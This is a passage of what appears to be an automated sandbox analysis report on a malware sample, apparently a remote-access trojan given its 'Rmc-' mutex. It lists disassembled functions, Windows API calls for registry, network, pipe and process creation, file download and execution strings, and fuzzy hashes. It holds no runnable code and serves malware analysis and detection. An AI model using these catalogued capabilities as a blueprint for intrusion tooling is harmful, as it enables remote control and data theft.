                                                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateErrorLastMutex
                                                                                • String ID: Rmc-GJDISH
                                                                                • API String ID: 1925916568-2180735960
                                                                                • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1287 412513-41253f RegOpenKeyExA 1288 412541-412567 RegQueryValueExA RegCloseKey 1287->1288 1289 412572 1287->1289 1288->1289 1291 412569-412570 1288->1291 1290 412577-412583 call 401f66 1289->1290 1291->1290
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                • RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: eefaa00199052949f50bc372dae43a8d785cde676b73bf91841c85306d5a74f2
                                                                                • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                • Opcode Fuzzy Hash: eefaa00199052949f50bc372dae43a8d785cde676b73bf91841c85306d5a74f2
                                                                                • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1294 4124b7-4124df RegOpenKeyExA 1295 4124e1-412509 RegQueryValueExA RegCloseKey 1294->1295 1296 41250f-412512 1294->1296 1295->1296 1297 41250b-41250e 1295->1297
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                • RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                Function 0041246E Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                • RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                Function 00409517 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: xAG
                                                                                • API String ID: 176396367-2759412365
                                                                                • Opcode ID: 573513da3506cc6e2164d5a8d3b0478513ec7ea66a17680ca2f11e08e2d1aca0
                                                                                • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                                • Opcode Fuzzy Hash: 573513da3506cc6e2164d5a8d3b0478513ec7ea66a17680ca2f11e08e2d1aca0
                                                                                • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                                Function 0044B9BE Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 0044B9DF
                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                • HeapReAlloc.KERNEL32(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocAllocate_free
                                                                                • String ID:
                                                                                • API String ID: 2447670028-0
                                                                                • Opcode ID: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                                                                                • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                                                                                • Opcode Fuzzy Hash: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                                                                                • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                                                                                Function 005B07A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005B07CE
                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 005B07EE
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146258809.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5b0000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 3833638111-0
                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction ID: 5f20ef3ee0f14b5cbd34ce0806dc149e082bf947dbaad13e1c58f5f577320b0b
                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction Fuzzy Hash: 78F062311017116FD7203AB5988DAAFBBECFF49765F101568E642910C0DE70F8454A61
                                                                                Function 004041F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                  • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEventStartupsocket
                                                                                • String ID:
                                                                                • API String ID: 1953588214-0
                                                                                • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                Function 0043360D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                  • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,00404AD0), ref: 00437C37
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                • String ID:
                                                                                • API String ID: 3476068407-0
                                                                                • Opcode ID: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                                                                                • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                • Opcode Fuzzy Hash: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                                                                                • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                                                Function 00780E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,00780223,?,?), ref: 00780E19
                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,00780223,?,?), ref: 00780E1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction ID: c37cf524c63f5757edd935c017db940ef546b67fe649cc31a07347fd0354d86c
                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction Fuzzy Hash: 77D0123114512877D7403A94DC09BCE7B1CDF05B62F008411FB0DD9080C774994047E5
                                                                                Function 00446AFF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                • Opcode Fuzzy Hash: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                Function 00404262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Startup
                                                                                • String ID:
                                                                                • API String ID: 724789610-0
                                                                                • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                Function 004260F7 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: recv
                                                                                • String ID:
                                                                                • API String ID: 1507349165-0
                                                                                • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                Function 0042610E Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: send
                                                                                • String ID:
                                                                                • API String ID: 2809346765-0
                                                                                • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                Function 005B0465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005B04B6
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146258809.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5b0000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction ID: 1b4e7d6d64ef6482b3ae29e82acede09d6b0a6ae3ef443c5ed4c03ad212d50f9
                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction Fuzzy Hash: A0112A79A40208EFDB01DF98C985E99BFF5AB08350F058094FA489B362D771EA50DB80

                                                                                Non-executed Functions

                                                                                Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                  • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                  • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                  • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                  • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                  • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                  • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                  • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                  • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                  • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                  • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                  • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                • API String ID: 2918587301-599666313
                                                                                • Opcode ID: 66c0a75e66747857048722de2f5a8f988e0fdfd323e85b4bbd61ae4f0198fe46
                                                                                • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                • Opcode Fuzzy Hash: 66c0a75e66747857048722de2f5a8f988e0fdfd323e85b4bbd61ae4f0198fe46
                                                                                • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                Function 00405042 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 280pipesleepfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                • CloseHandle.KERNEL32 ref: 004053CD
                                                                                • CloseHandle.KERNEL32 ref: 004053D5
                                                                                • CloseHandle.KERNEL32 ref: 004053E7
                                                                                • CloseHandle.KERNEL32 ref: 004053EF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
